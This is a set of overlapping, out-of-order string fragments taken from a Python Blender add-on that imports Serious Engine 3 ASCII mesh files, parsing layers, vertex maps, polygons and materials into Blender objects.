"se3_layer.vertex_maps[0].elements edges = [] real_faces = [] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices",
"= se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon)",
"= file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers",
"1 for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if current_index !=",
"map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative",
"num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers",
"= get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] ))",
"se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type,",
")) face_edges = get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge)",
"1] if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices,",
"#open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index",
"if se3_layer.surface_maps: materials = [] for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material)",
"for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex",
"file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps",
"= file_query.get_num_of_values() processed_values = 0 is_last_value = False last_value_idx = num_of_values - 1",
"[] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers",
"== se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl()",
"polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps = 0",
"map_type = file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl()",
"block file_query.follows_block_end_decl() #close layer block processed_layers += 1 file_query.follows_block_end_decl() #close layers block return",
"0.0, 1.0, 0.0, 0.0), ( 0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh)",
"1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups = []",
"\"\"\" edges.append(face_edge) edge_index_count += 1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0])",
"face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count +=",
"vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0",
"morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers +=",
"file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems += 1 file_query.follows_block_end_decl()",
"is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys",
"block file_query.follows_block_end_decl() #close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block",
"layer block processed_layers += 1 file_query.follows_block_end_decl() #close layers block return mesh def get_bl_face(se3_layer,",
"in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data])",
"face_index, tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k",
"layers block processed_layers = 0 while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index",
"processed_layers = 0 while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\")",
"= file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys = 0 while processed_polys < num_of_polys:",
"poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl()",
"if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices, ngon_face):",
"= [real_face[0] for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces)",
"#close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps =",
"while processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex",
"in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for edge in edges:",
"file_query.follows_block_end_decl() #close elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block",
"block processed_elems = 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem())",
"for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index,",
"!= last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces =",
"bpy from bpy_extras.mesh_utils import ngon_tessellate from . import se3 def get_se3_mesh_form_file(filepath): file_query =",
"mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers = 0",
"= len(se3_vertex_indices) last_index = num_of_indices - 1 for current_index in range(num_of_indices): next_index =",
"se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index)",
"block processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps = 0",
"< num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count =",
"or which_edge == edge_rev: return False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex =",
"elements block processed_elems = 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block",
"mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly",
"0.0, 1.0, 0.0), ( 0.0, 1.0, 0.0, 0.0), ( 0.0, 0.0, 0.0, 1.0)))",
"mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for",
"[] vertices = se3_layer.vertex_maps[0].elements edges = [] real_faces = [] se3_surface_map_indices = [0]",
"block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0 while num_of_processed_vertices",
"import ngon_tessellate from . import se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version =",
"#open polygon block num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value = False last_value_idx",
"= num_of_indices - 1 for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1]",
"0.0), ( 0.0, 1.0, 0.0, 0.0), ( 0.0, 0.0, 0.0, 1.0))) obj =",
"Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for se3_weight_map in se3_weight_maps:",
"0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0, 0.0, 0.0), (",
"0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0, 0.0, 0.0), ( 0.0, 0.0, 0.0,",
") return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices) last_index",
"else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces",
"mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0,",
"in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem =",
"import bpy from bpy_extras.mesh_utils import ngon_tessellate from . import se3 def get_se3_mesh_form_file(filepath): file_query",
"#close layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps =",
"edge or which_edge == edge_rev: return False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex",
"shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups",
"= se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight,",
"#close element block processed_elems += 1 file_query.follows_block_end_decl() #close elements block processed_maps += 1",
"uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices),",
"uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data):",
"True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = [] for i in",
"in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0,",
"for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if",
"block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl()",
"vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT:",
"get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1",
"math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices =",
"+= 1 \"\"\" edges.append(face_edge) edge_index_count += 1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges",
"se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co =",
"block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open",
"- 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups =",
"def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers =",
"[] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for",
"from mathutils import (Matrix, Vector) import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath)",
"type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name,",
"vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index =",
"num_of_indices - 1 for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if",
"+= 1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block",
"file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems",
"map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type",
"= ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face = [] for tessed_index in",
"edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in",
"get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\")",
"- 1 while processed_values < num_of_values: if processed_values == last_value_idx: is_last_value = True",
"fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for",
"if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type ==",
"vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index],",
"material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges:",
"def read_file(operator, context): from mathutils import (Matrix, Vector) import math filepath = operator.filepath",
"se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count =",
"get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges",
"se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps):",
"layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block",
"else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for",
"edge_rev = (edge[0], edge[1]) if which_edge == edge or which_edge == edge_rev: return",
"= file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0 num_of_texcoord_maps = 0",
"processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close polygon",
"#open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open",
"while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers",
"count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl()",
"for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if current_index != last_index",
"layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers +=",
"[] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices:",
"fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop",
"processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map",
"0 num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps = 0 while processed_maps <",
"range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data in",
"= se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for",
"block processed_polys = 0 while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open",
"= get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge:",
"faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps):",
"file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps",
"num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem",
"file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value = False",
"se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges):",
"num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers = 0 while processed_layers <",
"layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps)",
"edges = [] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices - 1 for current_index",
"= [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] =",
"from bpy_extras.mesh_utils import ngon_tessellate from . import se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath)",
"if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight",
"is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0] for real_face in real_faces] mesh",
"polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers += 1 file_query.follows_block_end_decl() #close layers",
"real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0), (",
"new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1])",
"file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps",
"context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\")",
"[] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index",
"= file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index)",
"0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count",
"for se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges = []",
"for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon",
"edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count += 1 else: ngon_face = get_bl_face(se3_layer,",
"get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count)",
"se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE')",
"i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index) for idx,",
"< num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer",
"= len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in",
"num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps = 0 while processed_poly_maps",
"tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices",
"= [] for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material =",
"type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT:",
"True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1",
"block processed_layers = 0 while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index =",
"1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block",
"( 0.0, 1.0, 0.0, 0.0), ( 0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name,",
"in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices:",
"== se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map =",
"processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map)",
"= se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if",
"num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems += 1",
"file_query.follows_block_end_decl() #close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices",
"= num_of_values - 1 while processed_values < num_of_values: if processed_values == last_value_idx: is_last_value",
"= se3_layer.vertex_maps[0].elements edges = [] real_faces = [] se3_surface_map_indices = [0] * len(se3_layer.polygons)",
"0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map =",
"- 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer = True",
"[] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps",
"= 0 num_of_weight_maps = 0 num_of_morph_maps = 0 while processed_maps < num_of_maps: map_type",
"for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers:",
"= bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index =",
"= se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp",
"file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index =",
"in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count",
"in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx",
"tessed_face in tessed_faces: fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return",
"= [] real_faces = [] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = []",
"= file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index =",
"bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index = material_indices[face.index]",
"enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def",
"uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return",
"enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv",
"se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp)",
"map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems += 1 file_query.follows_block_end_decl() #close elements block processed_maps",
"file_query.follows_block_end_decl() #close layer block processed_layers += 1 file_query.follows_block_end_decl() #close layers block return mesh",
"se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges =",
"open elements block processed_elems = 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element",
"real_faces = [] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index,",
"in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for",
